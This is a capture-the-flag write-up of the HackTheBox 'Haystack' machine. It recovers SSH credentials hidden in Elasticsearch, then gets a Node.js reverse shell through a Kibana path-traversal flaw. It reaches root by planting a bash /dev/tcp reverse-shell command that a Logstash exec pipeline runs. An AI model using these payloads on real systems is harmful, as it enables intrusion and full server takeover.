Haystack (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.115
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 08:31 GMT
Nmap scan report for 10.10.10.115
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn’t have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn’t have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 – 4.11 (92%), Linux 3.2 – 4.9 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 244.40 ms 10.10.14.1
2 243.96 ms 10.10.10.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.14 seconds

now on browser

http://10.10.10.115/

see the source code

<html>
<body>
<img src=”needle.jpg” />
</body>
</html>

on terminal

root@kali:~/Downloads# gedit /etc/hosts

10.10.10.115 haystack.htb

save it

root@kali:~/Downloads# curl http://haystack.htb:9200/
{
“name” : “iQEYHgS”,
“cluster_name” : “elasticsearch”,
“cluster_uuid” : “pjrX7V_gSFmJY-DxP4tCQg”,
“version” : {
“number” : “6.4.2”,
“build_flavor” : “default”,
“build_type” : “rpm”,
“build_hash” : “04711c2”,
“build_date” : “2018-09-26T13:34:09.098244Z”,
“build_snapshot” : false,
“lucene_version” : “7.4.0”,
“minimum_wire_compatibility_version” : “5.6.0”,
“minimum_index_compatibility_version” : “5.0.0”
},
“tagline” : “You Know, for Search”
}

root@kali:~/Desktop/HTB/boxes/haystack# gobuster -u http://haystack.htb/ -w /usr/share/wordlists/dirb/common.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://haystack.htb/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/11/01 17:44:51 Starting gobuster
=====================================================
/index.html (Status: 200)
=====================================================
2019/11/01 17:47:06 Finished
=====================================================

root@kali:~/Downloads# wget http://haystack.htb/needle.jpg
–2019-11-10 08:37:48– http://haystack.htb/needle.jpg
Resolving haystack.htb (haystack.htb)… 10.10.10.115
Connecting to haystack.htb (haystack.htb)|10.10.10.115|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 182982 (179K) [image/jpeg]
Saving to: ‘needle.jpg’

needle.jpg 100%[===================================================================>] 178.69K 243KB/s in 0.7s

2019-11-10 08:37:49 (243 KB/s) – ‘needle.jpg’ saved [182982/182982]

root@kali:~/Downloads# strings needle.jpg
JFIF
Exif
paint.net 4.1.1
UNICODE
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
sc,x
O9 x?
Lg9$
WVj[
-mO4r
xfuu
c;jVm
|eoh
|@gs
&Y7V
{$=1
QLAE
~)x7
=7It
T{V/
8I5K
1/i[
|qouf
e/~M
m>m7S
qT_71
+F~V
_j|5
53mm
kmyk#lV
~(|+
R#!wm]
nTec
|Ge3r
6qg$
yrRO
u?E~
+oEmA
kju”
]CxE
7ly6
m#+n
mG#mj
s8UZ
^=i{
-vFW9L
g-g8K
hX::1VF
nu=4
b9Z=b
l^FA
,]%QR
w?r>:~
Gg l
\h:-
xoAe
U%N:
^(i.&E
q+M)f
^o_A
k}}o
=q>vX
Yu+uVe
-x5#
s}qo4?
KRhdm
KY>V
C^yL
<]k& +kqp WK$o
q4sL
_5|B
[s3t
)KSX
MKTY
GPm5R9
TgLp
n7Vxz
]?yH
FdfVo
;_AxW
ufY7}
~#[i:m
“+]\
Lv6{
8mcY
OKHmm
x~XUv
|GU8
~1|D
U&yu
XUUy
yo”&
jm_Z
/5U9~
u:eN
6eVo1
>>5jw
;[ZO
;KS3
-t6;QWmsQ
>S)T;M7\{Y
=KXH
k+k7
v9-Ze
Xi#P
5MY>o
.1=C
ZT3+2
}Aw\\nn
*+<*v}k [l?a ?{um z$tF 4z\26 ~,|TKX (2@
wq_jx
u9″~
v:,z
fhao
ee_3sW
{46p
\M”‘
jIhyr
kIb/
S;3W
tc.c
{T2^|
|7c&
WMgo
e;Aqi*
I#u!
A|5k
p@2F6
Wmj]il
[}ro
=3K{u
7\|\
5($g
+I3*
<q}- xw\v=”” hz[]h=”” oq_|=”” ,:|*=””>
VdF7
m|3n
5Fff
R4U_
muu”C.
^[XU7m
[kWm9s
V>6x
+_}h?
q=l=;
5i\j c
+Jxrjb”
55[o
W{W=
a-“y
~5xN
_PV
Q,@
WVe`T
(,xX
(TD\*
y$v%
j*lkO]
\u*J
uqk;
U4y2
4|/m&
Tv}CRm
LE*{
+_Fh
fUUZ
_9)T
Iml< 772. .n4XS~ ]>7uX
Z{=>9.$f
<e#\x aaqr=”” sgop=””>+|J
nfUo
*yl”
m#+2
!Wum
9Z’)
H5-B-
xYb$tb
{I{(
Kk{vV]
H[kW
YYw-c
Xddt
yWuT
_1|p
{9!W
k3>ox
x’IY
}-c_
+-mND
)M#y
%Y.t+
4v>/
fKkh
wOVe
s\;6
jV:=
kx’z
7gu>i
pSs7
!\][
EY>]
t]/j
-|/&
=7PVfF
Qoq%
5a|-
_jMr
3%pF^
ws+m
o.Tgk[!
/K[t
L8|7
7+5t:n
vb9a
}6f}
%e?7
5|/32
j+{6
`n?d
m;a\gj9
V5#&
7Ei6
R2;#
.gdv?
qyJ#_
o^]6
B9MJ
^_I2
4o*?
jSou
I[%Xc
-_c~
k~>]
ETfm
^:M27E
=,EK{
FWVM
l]”‘
Ws-y
\bG1S&M
QkohTt< [wqQ Vvkn }kZRoTvF $a^g #R,~ 3+WM 3oc4z +b#O \fgm Ho5′ :
P3nj
}-}{
\{cTU_
[m~s
Gq$?.
u&[[Vf
o~ED
y31m
mtJ< _glo cmqF2 s$)’ Zm6= [\Y$ *$i^ c )Q< UwWG tdou k:g ow *7.z:#v \3ww:TlMu #$vS / |* 3jxY3 bMkV v:|+ ^]|H 9~ \ -tm>
i_>_
k|DW.
COEv~zxW
l[;i?
|My-
MupYVY^Ff
I=ue
xzO’
$xw/
teRV
<|+]’O ]\_ ,t?68[f M3+& s+6W YVEM FjSj aY#W TFVlW l^%o 4[[7 \\I3;375 ^&i$?5s o]_, 6k_t +_]|+ -Mog =IYv aafV Xl77 h:Z* #Y75s b+^Gm Q>UZ
[wY62
6;xQ
y2C6
35ih
9;d ac
333mU
|;mp
>”|V
G^{i>d
-NIc
>0^x+A
g|y6>{
m\W~
Z8>j
>it>s
et[=
nY6{WS$
$7S[m
ffoJ
6qmE
\I$0
*w14U
Y6:J
w%vFG
_Yi>N
slfv
s3y+
mr>.
vffn
3+7J
elcF
1[e_
W7.c
.$Vi
lL%#
>=#C
CXEfT
bj[x
\6Nz
Cyc}
WR8*A
l;4P
|'”It
,k]e
g-NLFqJ
WEL/;wg-J3
_#|T
i~)|Ry
_]3W]
ggyum
OzEV
)!Vf}
=*te
Kkt_
/zR8
W_,j
k_jgy>gj
g6:IA
=>Kx
TV;p
T.-UWuvFG,
5]3?
,)${
mNA>
Un5fi
ZfUo
WReY
[{f]
M”+nf
VVuo
14|Q
,co
-,F2
7[uF
w-zO
aO/;~e
iZ y
I%mi
tY5
y/$_
NciH
g&;(
$7bV
~0$r”
be/v
~l{-
d:j\y
K$>
7ock
MwwX
Gdcs
BfeVoz
<{Uv ~nk>
7Wy&
GvfUo
i>Tj
5Lsf
_BOwmko
5″{_
8mco1w*
%ni#G
-|Zf
|Aoyu#a
[FGx
ElE*g
k”(m
^.y.
XZfUZ
UWqj
3W/7
n5&e
boN’3
#[um
xZcj
`vX@
>;*^x
k;nf
t;U#o
wI%k
=/I_
k3M#
XaVgf
[vDe
8|7f
7gut
.fgRW”
n6eG
egUU_
~fvo
Z4eR|
ge}E
Q”U.
jW_+3
R8QU
b+V_
B[\F
3jWK
>!_]n
3Wdr
‘Md]
#eev
UQ~Uj
N&50
SkK&
&4fM
ZH66
]33;7
RY$`
V3o5
35}i
?(8e
735~
TmKo
3Oyq?
;~U_
kYay
wmr0Z
,Nz8>y
>8Xh
=.nH
ufgv
J68y
>HX#O
x~cg
Px’K
:1Q;
7-^O
=|bM6wD
_?,D
/|TM.
\tcy
;d{;X
sqk%
<uq’ crfi.=”” sn_d=”” wuz_=”” x=”” ck=”” e{=”.I;|” 9c=”” {=”” 8wc+g=”” xgmmb=”” vikn=”” t<|t=”” drno=”” u=””>aJE-
y>fj
.6j57
=kXH
1[km
n8R
RG_?U
\^^*
JmDJ
5-Ad0
gImW
73W9
333n
fffoZ
3+nZ
6*1>
o%$Vfm
_Bx?K[
0GU:1
?5d\
-oxn
1k#*
?]ve;w7
h4&e
*[XY
-w-Q
4NyH
wU &
3Tk’
#m’K
[y.
cg#>
~.|a
&Ufgf
k_A|R
YaxVUM
>8|X
,|@[y&T}
aI$]
>/|LO
^2IU
^V:QP5
iv)q”
]3l^W?v
MVk9
gu36
duZK4
KVXc
Q.Op
ufSZ
Zj ko
w,27
mk]’P
X~/I
z;j^
^nY>_
,5ht;
g:\J
>2jV
uqosun
[rn]
.k;5
R[=/dn
#L~D^
k;Y-
;;Y#
{5s6
SQ4X|B
m?5q
M][X
6Koy
[ugF2Q
_>|B
_=|Q
~’|\
NG+u
Mw{8
\\]F
3,-#*
U-?uH)
|Yyicy$vJ
/<e~ 7r\como$=”” ek{ui&=”” p=””>ff
KX|Y
b1Kh
$]CT,
LM^^
g|jEGqc
> _-
[;gm
}=Yq
_y|1
STfV
{}WP
W_a|
^E3}
7vm>
?#>’G33|
++3O;3z
nY~f
cV_d
mV8~
\?jmnF
w(7W
vOCx
$2lf
t]Y[mmC
imi&
SQ^-
SXxj [
U75rT
tw>6
fmCV
e]2?
XtKV
K[Uo
y/”{
hmQc
-.5o
|Avo’A
KT__
3Uy?i
-O!Q
{uW_
=KTb
m$eK
/z%F\
Tn~*x
^sqn
[uU{y$
svEj
Z?x/t
^wnX
/n>}R
^>34
5XUYWo
t]ZM6
YwWIg’
C=sF>
1{;
:f5$]
nUa\
“bu3[
jXa{
UmgI
IbLMss
>~”~
Euw!i$goRk
n\k_
MJm=
YT:c
u(-|
\3mY
-gR0
>=|F
3Xoe
{sW\
Mw>4
bf|`
n~0~
umJO.
s5~9|`
}Nzq
Fy7n
Dc’-J^< .c/\f k5t:o W=L= YjhuE QU6′ RRR;) G=L= &M=Y g5iF EXUZ y[m} 7-b|L xm/, f=yc |,jRR g)4l Z[Cl !m|ec5 Mgk6 ri~f l[lq ^$egV _nj_ I>V”
7<7y. g2C” Io
3{V_
{3WQ
d7 kP
m:1Q
&1ci
UdTf_
&|/]OKwD
hj6:D2
FKpG8
X[J$
*,k%
*e4j
t}b+
:i3jV
x.gMKO
~!C%
qpq9%
k;[y
V|}
[\>4
XaVm
~EDo
/-[s
cfHU~lW>”
7c41
RmiY
=JgI
oy}m
3^1?2
gSH3
G<c} l?kx~=”” wlc)=”” k=”t[” qw3ws=”” -lwczto=”” ]xcs6=”” kwau=”” 8{n`=”” }wwk=”” jv:]=”” (o=”” w=”” evy.uu{=”” (c^<=”” v5of=”” h]_j=”” <iqy=”” +nuj=”” lc)\=”” )v,s=”” d9oz=”” ]x:=”{M” hz*j:{f=”” _]i=”” x=”” _-wi$=”” -=”” f$pi8=”” 5oua)=”” \x3z=”” purf=”” #_z]=””>m+L
Ydxj
rj`[
~”h|q
ROq#*
e?zG
U-d7
dXQ{
[]kvz^
.$]G
ufw_
g_|T
6FhU
7.in
M42M
$sno
/73&
X|/gq
(?b;
2M$?+|
=”iF
^”Kx
;]5dZ
$r#H
UY!m
;37s]
{)>Te
3$rn
/$fgf-Y
NiHI>o
i 5~
nw+B
yhmN< `pug] -q#6 .kZ- ^[9B {:3A k}Jm >jn_
khY~
I4-&
cvLi
.Km[T
^m.6m
k}WV
\xz|
U{Vo
xVTuZ
ouUe^
“~Gw,c
;~f]
s^]lE
N’tO
Y{-~z~
u’TU
hztp
}5[l
j^>{
U#cJqO
5Tds
TN/iir
PXwy?y
O3miF
gOXWk/5
|\&H
r+$l
;;Kx
5{kt-$
>^%,
<m{#} t(gc=”” .zf=”” _3]?=”” [j0}=”” ;xew=”” ]xh~v=”” ^tm){z=”” !o3p=”” vj*=””>
ggfn
Z_^”
$fMR
>,|d
w5p7>%
lI3^
&eUVoj
4m$|W=J
cVve]
F$J(
F”]G
~Y>Z
_PMBM
r{Ox
_BxWB
Sog|
,+#|
CRI>
usWz
‘dcb8c
SX]B
zXz?h
cedu
>hr]/
#-o)=
0vwg’
Vt)-
<aa% do1y~=”” qo`xn=”” _=”R^” csuq=”” 5maf=”” u]^i=”” ‘-im=””>”|DmB
beY?
IsH1
!\I+
;5I7
~5[i
P>S’O
$?iO
>-[F
n’xG
jk[=
={Y[
MWYf
e`F2
1QVAE
#@?Xi
qn6EFVw?
ss#m
(GSl._S
{=&;Xn
6}5:
y/.$
Ccen
MrI-
=’CUgw
333n;
bKhn
I#W.
/kT+TO
+mSV
i)u%
2#$M#n
*[Oqm’
_6W)
|LVf
#nbM[
+[dVf
Ikq|
?iMs\
Wm}/
xT$1
|)k”
4[?E>&~
:xs T=
i2\m
eqqt
Uj-YZ
[F&< [?2O 5Kko ZUVUlW: HWs. mN7:) ;k}Gr} mcff UwRj W4m1 ;q[Vv[ eein )?.5
%Vg}
9|}v
7]|^
}2DWT}
_/NR
s;3t
OKm.
n6$Hn
sIhY
+#cR
njcB
&EO-
Tu(V
J7;U
+zW!qc5
uF7F
mUUY
Xo`H+
2Mw< ODvQ -?~} ^;ofVn Caes zW>”
?Ggf
.>1|t
>%i_
i5 < 9*JU&p_ aq+2 t}”GO “4v: q#aY wmFs C Em k^=J kuom #eTUj g_feZ k37j mt{= ~”xf=5 5LnM UVoj ;eeF >”_,1
-t^:
WDcs
Zlsy
csJq
*l2,-
KIk]
,VE]
giu 1
UUUF
@kZ|
6nO5C37
/![;xb
\;\46p
>-|n
<|V*Sd wfn=+ ?{#m >k_;
K^|Z
wg^3
#r3.
mV:Q
+CUH
|i}gou$zz
9.o.< w1s_3~ $B1?M? j$tF< \3[F #N0/ 5sb1 }k_X 8pte: [mu{H #HdVt M#N% {[gi V;Tfe ;3*6 q^N; PI%}]:~ Tb6f wmg* c,o7 O4HuHV W4==~_ *:nz YXY[ 19fc sNWaE ,peb kaHd ee`A ,9X- nU@X 9}J#uq }_Dix Ueyf 9.oo O2I&l 6mJm zL;Q 5tD] >*yl
7#~X
KWU:6
}MtS
33nuj
/.FV
]],;
73V,
5Tcc9T
jS;7
2_\*
mtz/
j%R’]<9 -bz>
i]i?
:4Uu;
%UC;*
QkFO1
}1]t0
Ue#*
#nb[
*09j
cgqt
l3M3
Ff^X
lt=k
!l~H
~M^{
3S\
hz=
U[mx
;PdO
iZ61
Wlcs
[mgG”6
&Ozz
C5}#
q}{q%
m:ti
IRKY
n|=au
^>_G
R\\7
RNE_
V-vah
gf?1
G]:j
foADi
9*T(_N
kAmv
#i@8
7DU?w
I3n[
;8[s*
b\t:
ivWz
k!.u{
7n?1#
QEh@QE
l>VQ
ggHQ
k)^?
XQ~o
m~$h
;[]&
_G|,
tf^R
{-hx
MWk?
}Ic]
tz||}
*+=o
eO-~OZ
+].L”n
[x{s
}%K/
j
[czW6|q
s&~lZ|
|1y
t
_Cx_
Nr:c
~/_1W
_+m]
Cu#mZ
+9FR
}&W(
ZkmC
Iw 7
sh?
z e2
\\;n
jw92
-wjb
>%Zs
HF{bs
j^&{Va
Y[mtZ
I48Q
5wV?
]i]a
usup
Kvv_
>5[hp
hn$[hw
Mqw#*
5kiz+L
Q)F&
w3ma_
QTnf’
~2YE
Y]GUoS
)NKf~-
y,Y8
>+|”V
I6ln]A
;m@66
~’xffb
Ee,=W
*xn8PK#j~
rG[X
e9sH
My#4
FOOZ
ufYF
O’bu
N{M3
:t6Q6
STW5
*Oo!;.o|?>
.n2FrZ
rrNMz
#=pMr
BN2I
,’*’
I$f2/<-iy bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== root@kali:~/Downloads# echo bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== | base64 -d la aguja en el pajar es “clave” Translation: la aguja en el pajar es “clave” => the needle in the haystack is “key”
</aa%></m{#}></c}></e~>
</uq’></e#\x></q}->

root@kali:~/Downloads# curl http://haystack.htb:9200/_search?q=clave
{“took”:121,”timed_out”:false,”_shards”:{“total”:11,”successful”:11,”skipped”:0,”failed”:0},”hits”:{“total”:2,”max_score”:5.9335938,”hits”:[{“_index”:”quotes”,”_type”:”quote”,”_id”:”45″,”_score”:5.9335938,”_source”:{“quote”:”Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg “}},{“_index”:”quotes”,”_type”:”quote”,”_id”:”111″,”_score”:5.3459888,”_source”:{“quote”:”Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=”}}]}}

After translation and decoding:

Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg => I have to save the password for the machine: user: security

Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk= => This key cannot be lost, I keep it here: pass: spanish.is.key

root@kali:~/Downloads# ssh security@haystack.htb
The authenticity of host ‘haystack.htb (10.10.10.115)’ can’t be established.
ECDSA key fingerprint is SHA256:ihn2fPA4jrn1hytN0y9Z3vKpIKuL4YYe3yuESD76JeA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘haystack.htb,10.10.10.115’ (ECDSA) to the list of known hosts.
security@haystack.htb’s password: spanish.is.key

Last failed login: Sun Nov 10 05:56:30 -03 2019 from 10.10.15.149 on ssh:notty
There were 2 failed login attempts since the last successful login.
Last login: Sun Nov 10 05:30:30 2019 from 10.10.15.14

[security@haystack ~]$

[security@haystack ~]$ cat user.txt
04d18bc79dac1d4XXXXXXXXXXXXXXXXXX

[security@haystack ~]$ cd /etc/logstash/conf.d/

[security@haystack conf.d]$ ls -la
total 12
drwxrwxr-x. 2 root kibana 62 Jun 24 08:12 .
drwxr-xr-x. 3 root root 183 Jun 18 22:15 ..
-rw-r—–. 1 root kibana 131 Jun 20 10:59 filter.conf
-rw-r—–. 1 root kibana 186 Jun 24 08:12 input.conf
-rw-r—–. 1 root kibana 109 Jun 24 08:12 output.conf

[security@haystack conf.d]$ cat input.conf
cat: input.conf: Permission denied

[security@haystack conf.d]$ cat filter.conf
cat: filter.conf: Permission denied

[security@haystack conf.d]$ cat output.conf
cat: output.conf: Permission denied

[security@haystack conf.d]$ ss -lnt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 *:80 *:*
LISTEN 0 128 *:9200 *:*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:5601 *:*
LISTEN 0 128 ::ffff:127.0.0.1:9000 :::*
LISTEN 0 128 :::80 :::*
LISTEN 0 128 ::ffff:127.0.0.1:9300 :::*
LISTEN 0 128 :::22 :::*
LISTEN 0 50 ::ffff:127.0.0.1:9600 :::*

root@kali:~/Downloads# ssh -L 5601:127.0.0.1:5601 security@haystack.htb
security@haystack.htb’s password: spanish.is.key
Last login: Sun Nov 10 05:56:42 2019 from 10.10.15.149

[security@haystack ~]$

[security@haystack conf.d]$ vim /dev/shm/shell.js

(function(){
var net = require(“net”),
cp = require(“child_process”),
sh = cp.spawn(“/bin/sh”, []);
var client = new net.Socket();
client.connect(5555, “10.10.15.149”, function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();

:wq!

on another terminal

root@kali:~/Downloads# nc -lvnp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555

back to shell

[security@haystack conf.d]$ curl -v “http://localhost:5601/api/console/api_server?apis=../../../../../../../../../../../dev/shm/shell.js”
* About to connect() to localhost port 5601 (#0)
* Trying ::1…
* Connection refused
* Trying 127.0.0.1…
* Connected to localhost (127.0.0.1) port 5601 (#0)
> GET /api/console/api_server?apis=../../../../../../../../../../../dev/shm/shell.js HTTP/1.1
> User-Agent: curl/7.29.0
> Host: localhost:5601
> Accept: */*
>

we get the shell

root@kali:~/Downloads# nc -lvnp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.115.
Ncat: Connection from 10.10.10.115:59234.

whoami
kibana
hostname
haystack

cd /etc/logstash/conf.d/
ls -lrt
total 12
-rw-r—–. 1 root kibana 131 jun 20 10:59 filter.conf
-rw-r—–. 1 root kibana 186 jun 24 08:12 input.conf
-rw-r—–. 1 root kibana 109 jun 24 08:12 output.conf

cat input.conf
input {
file {
path => “/opt/kibana/logstash_*”
start_position => “beginning”
sincedb_path => “/dev/null”
stat_interval => “10 second”
type => “execute”
mode => “read”
}
}
cat filter.conf
filter {
if [type] == “execute” {
grok {
match => { “message” => “Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}” }
}
}
}
cat output.conf
output {
if [type] == “execute” {
stdout { codec => json }
exec {
command => “%{comando} &”
}
}
}

on another terminal

root@kali:~/Downloads# nc -lvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

on previous shell

cd /opt/kibana/
touch /opt/kibana/logstash_1
echo “Ejecutar comando : bash -i >& /dev/tcp/10.10.15.149/6666 0>&1” > logstash_1

touch /opt/kibana/logstash_2
echo “Ejecutar comando : bash -i >& /dev/tcp/10.10.15.149/6666 0>&1” > logstash_2

touch /opt/kibana/logstash_3
echo “Ejecutar comando : bash -i >& /dev/tcp/10.10.15.149/6666 0>&1” > logstash_3

on listner shell

root@kali:~/Downloads# nc -lvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.115.
Ncat: Connection from 10.10.10.115:55618.
bash: no hay control de trabajos en este shell

[root@haystack /]# uname -a; hostname; whoami; id;
uname -a; hostname; whoami; id;
Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
haystack
root
uid=0(root) gid=0(root) grupos=0(root) contexto=system_u:system_r:unconfined_service_t:s0

[root@haystack /]# cd /root
cd /root

[root@haystack ~]# cat root.txt
cat root.txt
3f5f727c38d9f70e1XXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT